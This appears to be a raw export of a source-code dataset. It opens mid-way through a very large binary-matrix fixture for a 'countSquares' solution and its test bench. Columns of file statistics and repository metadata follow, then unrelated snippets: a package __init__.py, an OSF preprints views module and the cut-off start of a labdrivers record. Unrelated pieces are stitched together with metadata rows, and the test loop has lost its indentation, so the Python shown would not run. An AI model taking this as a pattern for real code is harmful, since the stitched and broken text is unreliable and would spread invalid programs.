0,1,1,0,0,0,1,0,1,0,0,1,0,0],[0,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0],[0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,1],[0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,1,1,0,0,0,1,0,1,0,0,0,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0],[1,1,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1],[1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,0,
1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1],[0,1,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,1,1],[0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1],[1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,0,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1],[1,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,1,0,0,
0,1,1,1,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1],[0,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,0,0,1,1,1],[0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,0,0,1],[1,0,1,1,1,0,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1],[0,1,0,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,1],[0,1,1,0,1,1,1,1,0,1,1,0,1,0,0,0,1,0,1,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,0,1,1,0,1,1,1,1,0],[1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1,1,0,0,0],[1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,0],[0,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,1,0,1,0,1],[0,1,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,1,0,0,1,0,0,0,1,1,1,1,0,0,1,0,0,1,1,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1],[0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,0,1,0,0,
0,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0],[1,1,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,1],[1,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1],[1,0,0,0,1,1,0,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,1],[0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0],[0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,0,
1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,1,0,1,0,0],[1,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,0],[0,0,0,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1],[0,1,1,1,0,0,0,0,1,0,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,0,1],[0,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,1,0,1,0,1,0],[1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,1,0,1,1,1,1,0,1,
0,0,1,1,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,0,1,0,0,1,0],[0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,1,1,0,1,1,0,0,0,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,1,1,1]]
),
]
# expected output:
'''
15
7
26466
'''
for t in test_data:
print( Solution().countSquares(matrix = t.matrix) )
return
if __name__ == '__main__':
test_bench()
| 849.86087
| 94,697
| 0.493973
| 47,418
| 97,734
| 1.017398
| 0.001814
| 0.493875
| 0.377029
| 0.254213
| 0.980557
| 0.978235
| 0.97666
| 0.97666
| 0.97666
| 0.976473
| 0
| 0.490589
| 0.016627
| 97,734
| 115
| 94,698
| 849.86087
| 0.011373
| 0.004236
| 0
| 0.214286
| 0
| 0
| 0.000236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.125
| 0.017857
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
ea8195bf300ad57d63f78ff2609600361b23a24e
| 49
|
py
|
Python
|
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
from . import resnet
from . import mobilenetv2
| 16.333333
| 26
| 0.755102
| 6
| 49
| 6.166667
| 0.666667
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.204082
| 49
| 2
| 27
| 24.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ea871d2f2c1f06c684ee07ef6f11ff030c3b78f7
| 205
|
py
|
Python
|
website/preprints/views.py
|
gaybro8777/osf.io
|
30408511510a40bc393565817b343ef5fd76ab14
|
[
"Apache-2.0"
] | 628
|
2015-01-15T04:33:22.000Z
|
2022-03-30T06:40:10.000Z
|
website/preprints/views.py
|
gaybro8777/osf.io
|
30408511510a40bc393565817b343ef5fd76ab14
|
[
"Apache-2.0"
] | 4,712
|
2015-01-02T01:41:53.000Z
|
2022-03-30T14:18:40.000Z
|
website/preprints/views.py
|
Johnetordoff/osf.io
|
de10bf249c46cede04c78f7e6f7e352c69e6e6b5
|
[
"Apache-2.0"
] | 371
|
2015-01-12T16:14:08.000Z
|
2022-03-31T18:58:29.000Z
|
# -*- coding: utf-8 -*-
from framework.flask import redirect # VOL-aware redirect
def preprint_landing_page(**kwargs):
    """Serve the preprints landing page with an empty template context.

    All routing kwargs are accepted and ignored; a fresh empty dict is
    returned on every call.
    """
    context = dict()
    return context
def preprint_redirect(**kwargs):
    """Redirect the request to ``/preprints/`` using the VOL-aware redirect.

    Routing kwargs are accepted and ignored.
    """
    target = '/preprints/'
    return redirect(target)
| 20.5
| 58
| 0.697561
| 24
| 205
| 5.833333
| 0.708333
| 0.157143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.156098
| 205
| 9
| 59
| 22.777778
| 0.803468
| 0.195122
| 0
| 0
| 0
| 0
| 0.067901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0.6
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
|
0
| 7
|
5785a98cf9cc33d00abace8cedd058ec0b38e504
| 163
|
py
|
Python
|
labdrivers/quantumdesign/__init__.py
|
pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 12
|
2016-10-14T09:50:32.000Z
|
2022-03-28T00:36:31.000Z
|
labdrivers/quantumdesign/__init__.py
|
